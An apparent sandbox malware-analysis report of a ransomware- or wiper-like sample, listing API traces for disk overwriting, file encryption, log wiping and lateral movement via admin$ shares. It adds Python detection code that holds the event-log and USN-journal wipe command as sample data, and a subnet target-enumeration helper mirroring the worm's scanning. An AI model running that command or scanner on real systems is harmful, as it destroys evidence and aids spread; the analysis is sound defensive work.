                                                • String ID: D$W$\\%s\admin$$\\%ws\admin$\%ws
                                                • API String ID: 1621451837-2183621537
                                                • Opcode ID: 0dfb436318fb230fb56bd91039f6d65b02b5a711e7d7a2a07dda49e65c438d6c
                                                • Instruction ID: dc418a4694d26a9889160893033f94fd4edb97f8018a020cd74f630067801734
                                                • Opcode Fuzzy Hash: 0dfb436318fb230fb56bd91039f6d65b02b5a711e7d7a2a07dda49e65c438d6c
                                                • Instruction Fuzzy Hash: 8FC15C71998355EFDB20DF61C884ADBBBE8FF89308F049D2EF98992111D7309594CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%
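Added example, not code from the sample or from this report: detection logic for two behaviours the API and string listings of the two preceding functions (02E57DEB and 02E59987) record, the chained "wevtutil cl Setup & ... & fsutil usn deletejournal /D %c:" command line formatted with wsprintfW at 02E5813B, and the staging of a file on another host's administrative share in the \\%ws\admin$\%ws form used ahead of WNetAddConnection2W and CreateProcessAsUserW. The events are constructed Sysmon-shaped records (EventID 1 process creation, EventID 11 file creation); host names, user names and the staged file name are invented, and the share check is generalised from admin$ to any administrative share (admin$ or a drive-letter$ share).

```python
"""Added example (not code from the sample or this report): detection of the
event-log wipe command line and of file staging on a remote administrative
share, run over constructed Sysmon-shaped events."""
import re

# "wevtutil cl <log>", log name captured; the sample chains four with '&'.
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+(\S+)", re.IGNORECASE)
# "fsutil usn deletejournal /D <drive>:" drops the NTFS change journal.
USN_DELETE = re.compile(r"\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b", re.IGNORECASE)
# \\host\admin$\file, generalised to any admin$ or <drive>$ share.
ADMIN_SHARE = re.compile(r"^\\\\([^\\]+)\\(admin\$|[a-z]\$)\\(.+)$", re.IGNORECASE)

# Constructed events (Sysmon EventID 1 = process create, 11 = file create).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "ws01", "User": "CORP\\alice",
     "CommandLine": "cmd.exe /c wevtutil cl Setup & wevtutil cl System & "
                    "wevtutil cl Security & wevtutil cl Application & "
                    "fsutil usn deletejournal /D C:"},
    {"EventID": 1, "Computer": "ws01", "User": "CORP\\admin",
     "CommandLine": "wevtutil cl Application"},
    {"EventID": 11, "Computer": "ws01", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "TargetFilename": "\\\\ws02\\admin$\\dllcm.dat"},
    {"EventID": 11, "Computer": "ws01", "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\notes.txt"},
]


def check_command_line(event):
    """Finding for log clearing / USN journal deletion, or None."""
    cmd = event.get("CommandLine", "")
    logs = [m.group(1) for m in WEVTUTIL_CLEAR.finditer(cmd)]
    usn = USN_DELETE.search(cmd) is not None
    if not logs and not usn:
        return None
    # One 'wevtutil cl' can be routine administration; several logs in one
    # command line, or any journal deletion, is the wipe seen in the sample.
    severity = "high" if usn or len(logs) >= 3 else "low"
    return {"rule": "anti_forensics_chain", "severity": severity,
            "host": event.get("Computer"), "user": event.get("User"),
            "logs_cleared": logs, "usn_journal_deleted": usn}


def check_file_create(event):
    """Finding when a file is written to another host's administrative share."""
    m = ADMIN_SHARE.match(event.get("TargetFilename", ""))
    if not m:
        return None
    return {"rule": "admin_share_staging", "severity": "high",
            "host": event.get("Computer"), "remote_host": m.group(1),
            "share": m.group(2).lower(), "file": m.group(3),
            "image": event.get("Image")}


def detect(events):
    """Apply the check matching each event's ID; return findings in event order."""
    checks = {1: check_command_line, 11: check_file_create}
    findings = []
    for ev in events:
        check = checks.get(ev.get("EventID"))
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The single "wevtutil cl Application" event is reported at low severity on purpose: administrators do clear one log now and then, while four logs plus the USN journal in one command line has no benign reading. Feeding real Sysmon exports in requires only mapping the EventID, CommandLine and TargetFilename fields onto the dictionaries used here.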

                                                Control-flow Graph

                                                control_flow_graph 194 2e58e7f-2e58ee5 call 2e5a4f0 memset * 2 GetAdaptersInfo 197 2e5907f-2e59087 194->197 198 2e58eeb-2e58eff LocalAlloc 194->198 198->197 199 2e58f05-2e58f0f GetAdaptersInfo 198->199 200 2e59075-2e59079 LocalFree 199->200 201 2e58f15-2e58f1d 199->201 200->197 202 2e58f23-2e58f63 inet_addr * 2 call 2e56916 201->202 203 2e58fc8-2e58fcf call 2e58243 201->203 210 2e58f65-2e58f7c call 2e56fc7 GetProcessHeap HeapFree 202->210 211 2e58f82-2e58f88 202->211 208 2e58fd1-2e58fd4 call 2e5908a 203->208 209 2e58fd9-2e58fdd 203->209 208->209 213 2e58fdf 209->213 214 2e5905e-2e59062 209->214 210->211 216 2e58fba-2e58fc2 211->216 217 2e58f8a-2e58f9c call 2e56916 211->217 218 2e58fe5-2e58ff3 LocalAlloc 213->218 214->200 221 2e59064-2e59073 CloseHandle 214->221 216->201 216->203 217->216 226 2e58f9e-2e58fb4 call 2e56fc7 GetProcessHeap HeapFree 217->226 222 2e58ff5-2e59014 inet_addr 218->222 223 2e59050-2e5905c 218->223 221->200 221->221 222->223 225 2e59016-2e5901e 222->225 223->214 223->218 225->223 227 2e59020-2e59046 htonl * 2 CreateThread 225->227 226->216 227->223 229 2e59048-2e5904c 227->229 229->223
                                                APIs
                                                • memset.MSVCRT ref: 02E58EA3
                                                • memset.MSVCRT ref: 02E58EC0
                                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 02E58EE0
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 02E58EF1
                                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 02E58F0B
                                                • inet_addr.WS2_32(000001B0), ref: 02E58F30
                                                • inet_addr.WS2_32(000001C0), ref: 02E58F44
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 02E58F75
                                                • HeapFree.KERNEL32(00000000), ref: 02E58F7C
                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 02E58FAD
                                                • HeapFree.KERNEL32(00000000), ref: 02E58FB4
                                                • LocalAlloc.KERNEL32(00000040,0000000C), ref: 02E58FE9
                                                • inet_addr.WS2_32(255.255.255.255), ref: 02E58FFA
                                                • htonl.WS2_32(?), ref: 02E59021
                                                • htonl.WS2_32(?), ref: 02E59029
                                                • CreateThread.KERNELBASE(00000000,00000000,02E58E04,00000000,00000000,00000000), ref: 02E5903E
                                                • CloseHandle.KERNEL32(?), ref: 02E59068
                                                • LocalFree.KERNEL32(?), ref: 02E59079
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
• Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                • String ID: 255.255.255.255
                                                • API String ID: 698255058-2422070025
                                                • Opcode ID: 6ebe8f748e229c07eeef9897ee5c6390eab8e1cdd92df2fc205a2efc89f32739
                                                • Instruction ID: f8fad3bd9ca46b2bd91f0ee4e83dc4d21be4403abd256d5149539c826d8f0e7e
                                                • Opcode Fuzzy Hash: 6ebe8f748e229c07eeef9897ee5c6390eab8e1cdd92df2fc205a2efc89f32739
                                                • Instruction Fuzzy Hash: 37516DB1994325EFD710EF61D88499BBBE9FF88314F509D2DFA9992100D7309494CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%
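Added example, not the sample's code: how per-host scan targets are derived from one adapter's IPv4 address and mask with the inet_addr / htonl style conversions that the function above (02E58E7F) performs between GetAdaptersInfo and its per-target CreateThread loop. Which condition the sample tests against inet_addr("255.255.255.255") is not visible in this report; the example treats that value as INADDR_NONE, inet_addr's error return, and skips such adapters, and it also skips the 0.0.0.0 entries GetAdaptersInfo reports for adapters without an address. The adapter records are constructed.

```python
"""Added example (not the sample's code): derive per-host scan targets from an
adapter's IPv4 address and mask with inet_addr / htonl style conversions.
Treating 255.255.255.255 as INADDR_NONE is this example's assumption."""
import itertools
import socket
import struct

INADDR_NONE = 0xFFFFFFFF  # inet_addr() error value; also 255.255.255.255 itself


def inet_addr_host(text):
    """inet_addr() then ntohl(): dotted quad -> host-order int, INADDR_NONE on error."""
    try:
        return struct.unpack("!I", socket.inet_aton(text))[0]
    except OSError:
        return INADDR_NONE


def dotted(n):
    """htonl() then inet_ntoa(): host-order int -> dotted quad."""
    return socket.inet_ntoa(struct.pack("!I", n))


def scan_targets(ip_text, mask_text, max_hosts=4096):
    """All other host addresses in the adapter's subnet, as dotted quads.
    Returns [] for unusable input: unparsable text, 255.255.255.255 (not
    distinguishable from INADDR_NONE), a 0.0.0.0 address or an empty mask."""
    ip, mask = inet_addr_host(ip_text), inet_addr_host(mask_text)
    if INADDR_NONE in (ip, mask) or ip == 0 or mask == 0:
        return []
    network = ip & mask
    broadcast = network | (~mask & 0xFFFFFFFF)
    if broadcast - network <= 1:          # /31 or /32: nothing to exclude
        candidates = range(network, broadcast + 1)
    else:                                 # skip network and broadcast addresses
        candidates = range(network + 1, broadcast)
    # Generator plus islice so a /8 does not expand to 16M strings before the cap.
    targets = (dotted(n) for n in candidates if n != ip)
    return list(itertools.islice(targets, max_hosts))  # the sample spawns one thread per target


def targets_for_adapters(adapters):
    """Walk a GetAdaptersInfo-style list; merge targets, first occurrence wins."""
    seen, out = set(), []
    for adapter in adapters:
        for t in scan_targets(adapter["ip"], adapter["mask"]):
            if t not in seen:
                seen.add(t)
                out.append(t)
    return out


# Constructed adapter list in the shape GetAdaptersInfo returns it.
SAMPLE_ADAPTERS = [
    {"name": "Ethernet0", "ip": "10.1.2.37", "mask": "255.255.255.0"},
    {"name": "Ethernet1", "ip": "0.0.0.0", "mask": "0.0.0.0"},
    {"name": "Bogus", "ip": "255.255.255.255", "mask": "255.255.255.255"},
]

if __name__ == "__main__":
    for t in targets_for_adapters(SAMPLE_ADAPTERS)[:5]:
        print(t)
```

The max_hosts cap is the one design choice worth noting: a worm that spawns a thread per address on a /16 or /8 adapter would exhaust its own host, so anything that enumerates from a mask needs a bound, and an analyst reading the real loop should look for whatever bound (or lack of one) the sample applies.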

                                                Control-flow Graph

                                                control_flow_graph 231 2e51038-2e510aa memset * 2 232 2e51221 231->232 233 2e510b0-2e510eb memset GetSystemDirectoryA 231->233 234 2e51226-2e5122a 232->234 235 2e510ed-2e510f5 GetLastError 233->235 236 2e5110a-2e5112b CreateFileA 233->236 235->234 237 2e510fb-2e51105 235->237 236->235 238 2e5112d-2e51148 DeviceIoControl 236->238 237->234 239 2e51166-2e5117d _itoa 238->239 240 2e5114a-2e51152 GetLastError 238->240 241 2e51180-2e51185 239->241 242 2e51154-2e51159 240->242 243 2e5115e-2e51161 240->243 241->241 245 2e51187-2e5118e 241->245 242->243 244 2e51213-2e5121f CloseHandle 243->244 244->234 246 2e51191-2e51196 245->246 246->246 247 2e51198-2e511a8 246->247 248 2e511b3-2e511b5 247->248 249 2e511aa-2e511b1 247->249 250 2e511b7-2e511be 248->250 251 2e511de 248->251 249->244 252 2e511c0 250->252 253 2e511c2-2e511dc memcpy 250->253 254 2e511e1-2e511e3 251->254 252->253 253->254 255 2e511e6-2e511eb 254->255 255->255 256 2e511ed-2e511f1 255->256 256->244 257 2e511f3-2e511fc 256->257 257->244 258 2e511fe-2e51210 memcpy 257->258 258->244
                                                APIs
                                                • memset.MSVCRT ref: 02E5105D
                                                • memset.MSVCRT ref: 02E51071
                                                • memset.MSVCRT ref: 02E510B9
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02E510E3
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E510ED
                                                • CreateFileA.KERNELBASE(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E5111F
                                                • DeviceIoControl.KERNELBASE(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 02E51140
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E5114A
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E51216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
• Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset$ErrorLast$CloseControlCreateDeviceDirectoryFileHandleSystem
                                                • String ID: \\.\0:$\\.\PhysicalDrive$z
                                                • API String ID: 1845136274-3982798494
                                                • Opcode ID: 3b7ce892da7d2e3a2cb6aec1701fb5348f36aab68d18436b163c1b2962ef7c85
                                                • Instruction ID: 87b5481b3af5d207a444e54254c2f7422f2cec7640859e6b257df0e72bb94e9f
                                                • Opcode Fuzzy Hash: 3b7ce892da7d2e3a2cb6aec1701fb5348f36aab68d18436b163c1b2962ef7c85
                                                • Instruction Fuzzy Hash: 98510572D90229AFDB10DFA4DC84BEE7B79AF05304F0081A5E959EB240D7355A89CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02E57424
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E57427
                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02E5743B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 02E57450
                                                • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 02E5746E
                                                • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 02E5747E
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 02E5749E
                                                • Sleep.KERNELBASE(000003E8), ref: 02E574B2
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E574C3
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E574C6
                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02E574E1
                                                • StrChrW.SHLWAPI(00000000,0000003A), ref: 02E574F6
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57513
                                                • HeapFree.KERNEL32(00000000), ref: 02E57516
                                                • FlushFileBuffers.KERNEL32(?), ref: 02E5751F
                                                • DisconnectNamedPipe.KERNEL32(?), ref: 02E57528
                                                • CloseHandle.KERNEL32(?), ref: 02E57531
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                • String ID:
                                                • API String ID: 1225799970-0
                                                • Opcode ID: 72d0da8932920c77450b330fb9e9e3dae548569cf898cf103ffb94dd29f30c12
                                                • Instruction ID: 23df68020779f541405c1ee28069bad884a467c208dc3a867e37c80784cb14d4
                                                • Opcode Fuzzy Hash: 72d0da8932920c77450b330fb9e9e3dae548569cf898cf103ffb94dd29f30c12
                                                • Instruction Fuzzy Hash: 0B416331DE0234BBDB216BA2DD49EAFBE3AEF45755F504854F905E5090C7708AA0CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • PathCombineW.SHLWAPI(?,?,02E60A6C,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E5199B
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 02E519B6
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 02E519DC
                                                • PathCombineW.SHLWAPI(?,?,?), ref: 02E51A7B
                                                • StrStrIW.SHLWAPI(C:\Windows;,?), ref: 02E51AA7
                                                • PathFindExtensionW.SHLWAPI(?), ref: 02E51AC7
                                                • wsprintfW.USER32 ref: 02E51AF9
                                                • StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 02E51B0F
                                                • FindNextFileW.KERNELBASE(?,?), ref: 02E51B2E
                                                • FindClose.KERNELBASE(?), ref: 02E51B40
                                                Strings
                                                • .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or, xrefs: 02E51B0A
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51983
                                                • %ws., xrefs: 02E51AF3
                                                • C:\Windows;, xrefs: 02E51AA2
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Path$CombineFile$CloseExtensionFirstNextObjectSingleWaitwsprintf
                                                • String ID: %ws.$.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or$C:\Windows;$Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3034020945-2646354609
                                                • Opcode ID: 4bfea066a8a93ebde044250ff403403188927b27fefccc7584a7e979da662ddb
                                                • Instruction ID: eafc004910f7370859cbdc70821778bdb61d3808fa2ab80758d5d85ef338a3cf
                                                • Opcode Fuzzy Hash: 4bfea066a8a93ebde044250ff403403188927b27fefccc7584a7e979da662ddb
                                                • Instruction Fuzzy Hash: FE51CD311A4326EADB219F24CC48BAB73A9EF54258F44EA19FC69CA090F732D254C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Yara matches
                                                Similarity
                                                • API ID: ioctlsocketsocket
                                                • String ID:
                                                • API String ID: 416004797-0
                                                • Opcode ID: 8cead146b6a088078a9f8eeb3b44ef399cb97cdd3123096ae135a4a078088789
                                                • Instruction ID: 67cca55c72d50ad94d38a2a6249b376be6624ec6a8431439bd16e3cec662d4a8
                                                • Opcode Fuzzy Hash: 8cead146b6a088078a9f8eeb3b44ef399cb97cdd3123096ae135a4a078088789
                                                • Instruction Fuzzy Hash: 5B724B311A4325BFDF119F61CD40E9BBBEAAF89388F80A918FE8496020E371D555DF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000), ref: 02E58CDB
                                                • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 02E58D04
                                                • LocalAlloc.KERNEL32(00000000,02E58DFD,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D0E
                                                • DeviceIoControl.KERNELBASE(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 02E58D2A
                                                • WriteFile.KERNELBASE(00000000,?,02E58DFD,?,00000000,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D3C
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D45
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D4C
                                                Yara matches
                                                Similarity
                                                • API ID: ControlDeviceFileLocal$AllocChangeCloseCreateFindFreeNotificationWrite
                                                • String ID: \\.\PhysicalDrive0
                                                • API String ID: 3555062078-1180397377
                                                • Opcode ID: 5e2aea2d6238d2b70d994a9eeae9bae0038e3415eed4b58e18313ac4a78727d0
                                                • Instruction ID: 0130113a2c84401fc303af2e91866e141b4e6e9d2cc022a82f763fc4ca1d1e50
                                                • Opcode Fuzzy Hash: 5e2aea2d6238d2b70d994a9eeae9bae0038e3415eed4b58e18313ac4a78727d0
                                                • Instruction Fuzzy Hash: 7F115672A91238BFD72196A29D89EDF7FACEF4A665F005811F506E6040D6709680C7B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000,F0000000,?,75B05180,?,?,?,?,02E51B25,?), ref: 02E518B3
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02E51B25,?,?), ref: 02E518CC
                                                • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,02E51B25,?), ref: 02E518F2
                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,02E51B25,?), ref: 02E51907
                                                • CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,02E51B25,?), ref: 02E51924
                                                • FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,02E51B25,?), ref: 02E51932
                                                • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,02E51B25,?), ref: 02E51939
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,02E51B25,?), ref: 02E51942
                                                • FindCloseChangeNotification.KERNELBASE(02E51B25,?,?,?,?,02E51B25,?), ref: 02E5194B
                                                Yara matches
                                                Similarity
                                                • API ID: File$View$ChangeCloseCreateFindNotification$CryptEncryptFlushMappingSizeUnmap
                                                • String ID:
                                                • API String ID: 4229333957-0
                                                • Opcode ID: 2821bdad510c8910b6f1ec88c46c9005b4d60714543bb4d7b0c62e5bfdc43818
                                                • Instruction ID: 9508df9f3b89948b74a190c0d37a151c8ee81940d500e7a81532e65a4605fdb0
                                                • Opcode Fuzzy Hash: 2821bdad510c8910b6f1ec88c46c9005b4d60714543bb4d7b0c62e5bfdc43818
                                                • Instruction Fuzzy Hash: 5E216B31991228BFDB219FA6CD48EEF7F79EF0A6A5F408121F909E6150D7308591DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 02E51E74
                                                • GetLastError.KERNEL32 ref: 02E51E7A
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,00000008), ref: 02E51EA3
                                                • CryptDestroyKey.ADVAPI32(?,?,?,0000000F,?), ref: 02E51EC9
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02E51ED4
                                                • LocalFree.KERNEL32(?), ref: 02E51EE0
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Context$Acquire$DestroyErrorFreeLastLocalRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 2290729596-63410773
                                                • Opcode ID: c83ea47538e0d76924dad0f3cbbbd4b83b6524250d56a1fe9c6b5e151615944d
                                                • Instruction ID: 89fe3e1f6dd277b56508b2ce47dbb55513a35e572d998f8088231b6473662918
                                                • Opcode Fuzzy Hash: c83ea47538e0d76924dad0f3cbbbd4b83b6524250d56a1fe9c6b5e151615944d
                                                • Instruction Fuzzy Hash: 5B11C4316E0338BBDB205A629C05F9F3A9DAF45B55F009415FE08EF180CBA4E94197B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 02E5A317
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02E5A335
                                                • htons.WS2_32(?), ref: 02E5A355
                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 02E5A369
                                                • connect.WS2_32(00000000,?,?), ref: 02E5A37B
                                                • select.WS2_32(00000001,00000000,?,00000000,?), ref: 02E5A3A8
                                                • __WSAFDIsSet.WS2_32(00000000,?), ref: 02E5A3BB
                                                • closesocket.WS2_32(00000000), ref: 02E5A3C9
                                                Yara matches
                                                Similarity
                                                • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                • String ID:
                                                • API String ID: 1369790671-0
                                                • Opcode ID: 18660b148e12b52562549ad42949e481593193dd9d52d5b958fe8eb1c98895e7
                                                • Instruction ID: a8c36453a5be70ba6652bae0ec66c3f27042949729b2d7314245017f4c78596c
                                                • Opcode Fuzzy Hash: 18660b148e12b52562549ad42949e481593193dd9d52d5b958fe8eb1c98895e7
                                                • Instruction Fuzzy Hash: 13318FB5C50328BFDB109FA5CC88AEEBBBCFF48314F004966E919E2150E7749A95CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585E2
                                                • LockResource.KERNEL32(00000000,?,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585F2
                                                • SizeofResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58607
                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E5861F
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58622
                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,02CE5020,-00000004,000000C1,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?), ref: 02E58665
                                                • HeapFree.KERNEL32(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58668
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Resource$Process$AllocateFreeLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3946667768-0
                                                • Opcode ID: b3ce8916b44158e3f36243c531247f80a28ad1d8725c0ec802e05abf27a96b28
                                                • Instruction ID: 1a0249eff606078e73b24f9dfcc3f332cf31fd3db8fd4a23f7096a459ac6dc19
                                                • Opcode Fuzzy Hash: b3ce8916b44158e3f36243c531247f80a28ad1d8725c0ec802e05abf27a96b28
                                                • Instruction Fuzzy Hash: 4F116DB19A0225AFDB15AFA6DC08F9A7BB9EF48368F008518FD45D7250DB70D990CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E51B66
                                                • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 02E51B87
                                                • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 02E51B96
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51B54
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Param
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 29517873-63410773
                                                • Opcode ID: b8561d7f951ddc34b6cb8a52da6610914a14d0b0f5e03f5ac07b1cd30c39c858
                                                • Instruction ID: ff71c3edaee95b7e7da4e7185d5fdcb8adfa6df752cd9e41303c231676d638c2
                                                • Opcode Fuzzy Hash: b8561d7f951ddc34b6cb8a52da6610914a14d0b0f5e03f5ac07b1cd30c39c858
                                                • Instruction Fuzzy Hash: 76F017B6A80218BEEB009F99DC81FAABBBDEF44704F104469A701E7191D671DA15CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NetServerGetInfo.NETAPI32(00000000,00000065,?,6F9B4950,?,?,02E58FCD), ref: 02E58254
                                                • NetApiBufferFree.NETAPI32(?,?,?,02E58FCD), ref: 02E58277
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
